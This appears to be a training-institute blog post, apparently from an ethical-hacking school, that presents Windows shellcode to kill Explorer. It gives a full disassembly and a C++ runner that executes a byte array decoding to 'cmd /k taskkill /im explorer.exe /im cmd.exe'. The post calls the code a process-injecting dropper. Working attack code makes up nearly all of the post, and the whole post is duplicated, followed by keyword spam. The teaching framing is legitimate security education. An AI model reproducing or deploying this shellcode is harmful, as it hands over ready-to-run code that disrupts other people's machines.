Filename | Windows 8 Remote Explorer Kill with Shell Code |
Permission | rw-r--r-- |
Author | Unknown |
Date and Time | 3/05/2014 |
Label | Exploit| Penetration |
Action |
Ethical Hacking Institute in Pune
./Arizona Team
This post will elaborate how to take down a Explorer with help of shellcode. In CEH class we had created a dropper with exe extension, this is a more advance dropper that can be used to inject any process for the current example I have taken a explorer process.
The assembly logic flow is as below, this is a advance call to the same thing which was shown to you in buffer overflow class i.e the memory addresses of all the elements:
00401000 > $ 33F6 XOR ESI,ESI
00401002 . 33C9 XOR ECX,ECX
00401004 . 64:8B71 30 MOV ESI,DWORD PTR FS:[ECX+30]
00401008 . 8B76 0C MOV ESI,DWORD PTR DS:[ESI+C]
0040100B . 8B76 1C MOV ESI,DWORD PTR DS:[ESI+1C]
0040100E . 33DB XOR EBX,EBX
00401010 > 43 INC EBX
00401011 . 8B6E 08 MOV EBP,DWORD PTR DS:[ESI+8]
00401014 . 8B7E 20 MOV EDI,DWORD PTR DS:[ESI+20]
00401017 . 8B36 MOV ESI,DWORD PTR DS:[ESI]
00401019 . B8 11111111 MOV EAX,11111111
0040101E . B9 14111111 MOV ECX,11111114
00401023 . 2BC8 SUB ECX,EAX
00401025 . 8BD1 MOV EDX,ECX
00401027 . 3BDA CMP EBX,EDX
00401029 .^75 E5 JNZ SHORT messageb.00401010
0040102B . B9 73311111 MOV ECX,11113173
00401030 . 2BC8 SUB ECX,EAX
00401032 . 03E9 ADD EBP,ECX
00401034 . 8BD4 MOV EDX,ESP
00401036 . B9 10211111 MOV ECX,11112110
0040103B . 2BC8 SUB ECX,EAX
0040103D . 2BD1 SUB EDX,ECX
0040103F . B9 636D6420 MOV ECX,20646D63
00401044 . 890A MOV DWORD PTR DS:[EDX],ECX
00401046 . B9 2F6B2074 MOV ECX,74206B2F
0040104B . 894A 04 MOV DWORD PTR DS:[EDX+4],ECX
0040104E . B9 61736B6B MOV ECX,6B6B7361
00401053 . 894A 08 MOV DWORD PTR DS:[EDX+8],ECX
00401056 . B9 696C6C20 MOV ECX,206C6C69
0040105B . 894A 0C MOV DWORD PTR DS:[EDX+C],ECX
0040105E . B9 2F696D20 MOV ECX,206D692F
00401063 . 894A 10 MOV DWORD PTR DS:[EDX+10],ECX
00401066 . B9 6578706C MOV ECX,6C707865
0040106B . 894A 14 MOV DWORD PTR DS:[EDX+14],ECX
0040106E . B9 6F726572 MOV ECX,7265726F
00401073 . 894A 18 MOV DWORD PTR DS:[EDX+18],ECX
00401076 . B9 2E657865 MOV ECX,6578652E
0040107B . 894A 1C MOV DWORD PTR DS:[EDX+1C],ECX
0040107E . B9 202F696D MOV ECX,6D692F20
00401083 . 894A 20 MOV DWORD PTR DS:[EDX+20],ECX
00401086 . B9 20636D64 MOV ECX,646D6320
0040108B . 894A 24 MOV DWORD PTR DS:[EDX+24],ECX
0040108E . B9 2E657865 MOV ECX,6578652E
00401093 . 894A 28 MOV DWORD PTR DS:[EDX+28],ECX
00401096 . B9 31407711 MOV ECX,11774031
0040109B . 2BC8 SUB ECX,EAX
0040109D . 894A 2C MOV DWORD PTR DS:[EDX+2C],ECX
004010A0 . 33DB XOR EBX,EBX
004010A2 . 8BF4 MOV ESI,ESP
004010A4 . B9 65111111 MOV ECX,11111165
004010A9 . 2BC8 SUB ECX,EAX
004010AB . 8D4E AC LEA ECX,DWORD PTR DS:[ESI-54]
004010AE . 51 PUSH ECX
004010AF . 8D4E BC LEA ECX,DWORD PTR DS:[ESI-44]
004010B2 . 51 PUSH ECX
004010B3 . 53 PUSH EBX
004010B4 . 53 PUSH EBX
004010B5 . B9 31131111 MOV ECX,11111331
004010BA . 2BC8 SUB ECX,EAX
004010BC . 51 PUSH ECX
004010BD . 53 PUSH EBX
004010BE . 53 PUSH EBX
004010BF . 53 PUSH EBX
004010C0 . 52 PUSH EDX
004010C1 . 53 PUSH EBX
004010C2 . FFD5 CALL EBP
004010C4 . 33F6 XOR ESI,ESI
004010C6 . 33C9 XOR ECX,ECX
004010C8 . 64:8B71 30 MOV ESI,DWORD PTR FS:[ECX+30]
004010CC . 8B76 0C MOV ESI,DWORD PTR DS:[ESI+C]
004010CF . 8B76 1C MOV ESI,DWORD PTR DS:[ESI+1C]
004010D2 . 33DB XOR EBX,EBX
004010D4 > 43 INC EBX
004010D5 . 8B6E 08 MOV EBP,DWORD PTR DS:[ESI+8]
004010D8 . 8B7E 20 MOV EDI,DWORD PTR DS:[ESI+20]
004010DB . 8B36 MOV ESI,DWORD PTR DS:[ESI]
004010DD . B8 11111111 MOV EAX,11111111
004010E2 . B9 13111111 MOV ECX,11111113
004010E7 . 2BC8 SUB ECX,EAX
004010E9 . 8BD1 MOV EDX,ECX
004010EB . 3BDA CMP EBX,EDX
004010ED .^75 E5 JNZ SHORT messageb.004010D4
004010EF . B8 11111111 MOV EAX,11111111
004010F4 . B9 37261411 MOV ECX,11142637
004010F9 . 2BC8 SUB ECX,EAX
004010FB . 03E9 ADD EBP,ECX
004010FD . FFD5 CALL EBP
The embedded code is as follow, go through the code understand the logic and generate your own code remember you need your metasploit updated to replicate the scenario. If you have and problem in understanding you can shoot your query to instructor@arizonainfotech.com or you can get to us through our facebook page:
Code:
#include <iostream>
using namespace std;
char code[] = "\x33\xF6\x33\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x33"
"\xDB\x43\x8B\x6E\x08\x8B\x7E\x20\x8B\x36\xB8\x11\x11\x11\x11\xB9\x14"
"\x11\x11\x11\x2B\xC8\x8B\xD1\x3B\xDA\x75\xE5\xB9\x73\x31\x11"
"\x11\x2B\xC8\x03\xE9\x8B\xD4\xB9\x10\x21\x11\x11\x2B\xC8\x2B\xD1\xB9"
"\x63\x6D\x64\x20\x89\x0A\xB9\x2F\x6B\x20\x74\x89\x4A\x04\xB9"
"\x61\x73\x6B\x6B\x89\x4A\x08\xB9\x69\x6C\x6C\x20\x89\x4A\x0C\xB9\x2F"
"\x69\x6D\x20\x89\x4A\x10\xB9\x65\x78\x70\x6C\x89\x4A\x14\xB9"
"\x6F\x72\x65\x72\x89\x4A\x18\xB9\x2E\x65\x78\x65\x89\x4A\x1C\xB9\x20"
"\x2F\x69\x6D\x89\x4A\x20\xB9\x20\x63\x6D\x64\x89\x4A\x24\xB9"
"\x2E\x65\x78\x65\x89\x4A\x28\xB9\x31\x40\x77\x11\x2B\xC8\x89\x4A\x2C"
"\x33\xDB\x8B\xF4\xB9\x65\x11\x11\x11\x2B\xC8\x8D\x4E\xAC\x51"
"\x8D\x4E\xBC\x51\x53\x53\xB9\x31\x13\x11\x11\x2B\xC8\x51\x53\x53\x53"
"\x52\x53\xFF\xD5\x33\xF6\x33\xC9\x64\x8B\x71\x30\x8B\x76\x0C"
"\x8B\x76\x1C\x33\xDB\x43\x8B\x6E\x08\x8B\x7E\x20\x8B\x36\xB8\x11\x11"
"\x11\x11\xB9\x13\x11\x11\x11\x2B\xC8\x8B\xD1\x3B\xDA\x75\xE5"
"\xB8\x11\x11\x11\x11\xB9\x37\x26\x14\x11\x2B\xC8\x03\xE9\xFF\xD5";
int main(){printf("Shellcode Length is : %u\n",strlen(code));system("PAUSE");
int (*_13)() = (int(*)())code; _13(); }
www.arizonainfotech.com
CEH CHFI ECSA ENSA CCNA CCNA SECURITY MCITP RHCE CHECKPOINT ASA FIREWALL VMWARE CLOUD ANDROID IPHONE NETWORKING HARDWARE TRAINING INSTITUTE IN PUNE, Certified Ethical Hacking, IT Security Training Information Security Traning Courses in Pune, ceh certification in pune, Ethical Hacking Course in Pune
./Arizona Team
This post will elaborate how to take down a Explorer with help of shellcode. In CEH class we had created a dropper with exe extension, this is a more advance dropper that can be used to inject any process for the current example I have taken a explorer process.
The assembly logic flow is as below, this is a advance call to the same thing which was shown to you in buffer overflow class i.e the memory addresses of all the elements:
00401000 > $ 33F6 XOR ESI,ESI
00401002 . 33C9 XOR ECX,ECX
00401004 . 64:8B71 30 MOV ESI,DWORD PTR FS:[ECX+30]
00401008 . 8B76 0C MOV ESI,DWORD PTR DS:[ESI+C]
0040100B . 8B76 1C MOV ESI,DWORD PTR DS:[ESI+1C]
0040100E . 33DB XOR EBX,EBX
00401010 > 43 INC EBX
00401011 . 8B6E 08 MOV EBP,DWORD PTR DS:[ESI+8]
00401014 . 8B7E 20 MOV EDI,DWORD PTR DS:[ESI+20]
00401017 . 8B36 MOV ESI,DWORD PTR DS:[ESI]
00401019 . B8 11111111 MOV EAX,11111111
0040101E . B9 14111111 MOV ECX,11111114
00401023 . 2BC8 SUB ECX,EAX
00401025 . 8BD1 MOV EDX,ECX
00401027 . 3BDA CMP EBX,EDX
00401029 .^75 E5 JNZ SHORT messageb.00401010
0040102B . B9 73311111 MOV ECX,11113173
00401030 . 2BC8 SUB ECX,EAX
00401032 . 03E9 ADD EBP,ECX
00401034 . 8BD4 MOV EDX,ESP
00401036 . B9 10211111 MOV ECX,11112110
0040103B . 2BC8 SUB ECX,EAX
0040103D . 2BD1 SUB EDX,ECX
0040103F . B9 636D6420 MOV ECX,20646D63
00401044 . 890A MOV DWORD PTR DS:[EDX],ECX
00401046 . B9 2F6B2074 MOV ECX,74206B2F
0040104B . 894A 04 MOV DWORD PTR DS:[EDX+4],ECX
0040104E . B9 61736B6B MOV ECX,6B6B7361
00401053 . 894A 08 MOV DWORD PTR DS:[EDX+8],ECX
00401056 . B9 696C6C20 MOV ECX,206C6C69
0040105B . 894A 0C MOV DWORD PTR DS:[EDX+C],ECX
0040105E . B9 2F696D20 MOV ECX,206D692F
00401063 . 894A 10 MOV DWORD PTR DS:[EDX+10],ECX
00401066 . B9 6578706C MOV ECX,6C707865
0040106B . 894A 14 MOV DWORD PTR DS:[EDX+14],ECX
0040106E . B9 6F726572 MOV ECX,7265726F
00401073 . 894A 18 MOV DWORD PTR DS:[EDX+18],ECX
00401076 . B9 2E657865 MOV ECX,6578652E
0040107B . 894A 1C MOV DWORD PTR DS:[EDX+1C],ECX
0040107E . B9 202F696D MOV ECX,6D692F20
00401083 . 894A 20 MOV DWORD PTR DS:[EDX+20],ECX
00401086 . B9 20636D64 MOV ECX,646D6320
0040108B . 894A 24 MOV DWORD PTR DS:[EDX+24],ECX
0040108E . B9 2E657865 MOV ECX,6578652E
00401093 . 894A 28 MOV DWORD PTR DS:[EDX+28],ECX
00401096 . B9 31407711 MOV ECX,11774031
0040109B . 2BC8 SUB ECX,EAX
0040109D . 894A 2C MOV DWORD PTR DS:[EDX+2C],ECX
004010A0 . 33DB XOR EBX,EBX
004010A2 . 8BF4 MOV ESI,ESP
004010A4 . B9 65111111 MOV ECX,11111165
004010A9 . 2BC8 SUB ECX,EAX
004010AB . 8D4E AC LEA ECX,DWORD PTR DS:[ESI-54]
004010AE . 51 PUSH ECX
004010AF . 8D4E BC LEA ECX,DWORD PTR DS:[ESI-44]
004010B2 . 51 PUSH ECX
004010B3 . 53 PUSH EBX
004010B4 . 53 PUSH EBX
004010B5 . B9 31131111 MOV ECX,11111331
004010BA . 2BC8 SUB ECX,EAX
004010BC . 51 PUSH ECX
004010BD . 53 PUSH EBX
004010BE . 53 PUSH EBX
004010BF . 53 PUSH EBX
004010C0 . 52 PUSH EDX
004010C1 . 53 PUSH EBX
004010C2 . FFD5 CALL EBP
004010C4 . 33F6 XOR ESI,ESI
004010C6 . 33C9 XOR ECX,ECX
004010C8 . 64:8B71 30 MOV ESI,DWORD PTR FS:[ECX+30]
004010CC . 8B76 0C MOV ESI,DWORD PTR DS:[ESI+C]
004010CF . 8B76 1C MOV ESI,DWORD PTR DS:[ESI+1C]
004010D2 . 33DB XOR EBX,EBX
004010D4 > 43 INC EBX
004010D5 . 8B6E 08 MOV EBP,DWORD PTR DS:[ESI+8]
004010D8 . 8B7E 20 MOV EDI,DWORD PTR DS:[ESI+20]
004010DB . 8B36 MOV ESI,DWORD PTR DS:[ESI]
004010DD . B8 11111111 MOV EAX,11111111
004010E2 . B9 13111111 MOV ECX,11111113
004010E7 . 2BC8 SUB ECX,EAX
004010E9 . 8BD1 MOV EDX,ECX
004010EB . 3BDA CMP EBX,EDX
004010ED .^75 E5 JNZ SHORT messageb.004010D4
004010EF . B8 11111111 MOV EAX,11111111
004010F4 . B9 37261411 MOV ECX,11142637
004010F9 . 2BC8 SUB ECX,EAX
004010FB . 03E9 ADD EBP,ECX
004010FD . FFD5 CALL EBP
The embedded code is as follow, go through the code understand the logic and generate your own code remember you need your metasploit updated to replicate the scenario. If you have and problem in understanding you can shoot your query to instructor@arizonainfotech.com or you can get to us through our facebook page:
Code:
#include <iostream>
using namespace std;
char code[] = "\x33\xF6\x33\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x33"
"\xDB\x43\x8B\x6E\x08\x8B\x7E\x20\x8B\x36\xB8\x11\x11\x11\x11\xB9\x14"
"\x11\x11\x11\x2B\xC8\x8B\xD1\x3B\xDA\x75\xE5\xB9\x73\x31\x11"
"\x11\x2B\xC8\x03\xE9\x8B\xD4\xB9\x10\x21\x11\x11\x2B\xC8\x2B\xD1\xB9"
"\x63\x6D\x64\x20\x89\x0A\xB9\x2F\x6B\x20\x74\x89\x4A\x04\xB9"
"\x61\x73\x6B\x6B\x89\x4A\x08\xB9\x69\x6C\x6C\x20\x89\x4A\x0C\xB9\x2F"
"\x69\x6D\x20\x89\x4A\x10\xB9\x65\x78\x70\x6C\x89\x4A\x14\xB9"
"\x6F\x72\x65\x72\x89\x4A\x18\xB9\x2E\x65\x78\x65\x89\x4A\x1C\xB9\x20"
"\x2F\x69\x6D\x89\x4A\x20\xB9\x20\x63\x6D\x64\x89\x4A\x24\xB9"
"\x2E\x65\x78\x65\x89\x4A\x28\xB9\x31\x40\x77\x11\x2B\xC8\x89\x4A\x2C"
"\x33\xDB\x8B\xF4\xB9\x65\x11\x11\x11\x2B\xC8\x8D\x4E\xAC\x51"
"\x8D\x4E\xBC\x51\x53\x53\xB9\x31\x13\x11\x11\x2B\xC8\x51\x53\x53\x53"
"\x52\x53\xFF\xD5\x33\xF6\x33\xC9\x64\x8B\x71\x30\x8B\x76\x0C"
"\x8B\x76\x1C\x33\xDB\x43\x8B\x6E\x08\x8B\x7E\x20\x8B\x36\xB8\x11\x11"
"\x11\x11\xB9\x13\x11\x11\x11\x2B\xC8\x8B\xD1\x3B\xDA\x75\xE5"
"\xB8\x11\x11\x11\x11\xB9\x37\x26\x14\x11\x2B\xC8\x03\xE9\xFF\xD5";
int main(){printf("Shellcode Length is : %u\n",strlen(code));system("PAUSE");
int (*_13)() = (int(*)())code; _13(); }
www.arizonainfotech.com
CEH CHFI ECSA ENSA CCNA CCNA SECURITY MCITP RHCE CHECKPOINT ASA FIREWALL VMWARE CLOUD ANDROID IPHONE NETWORKING HARDWARE TRAINING INSTITUTE IN PUNE, Certified Ethical Hacking, IT Security Training Information Security Traning Courses in Pune, ceh certification in pune, Ethical Hacking Course in Pune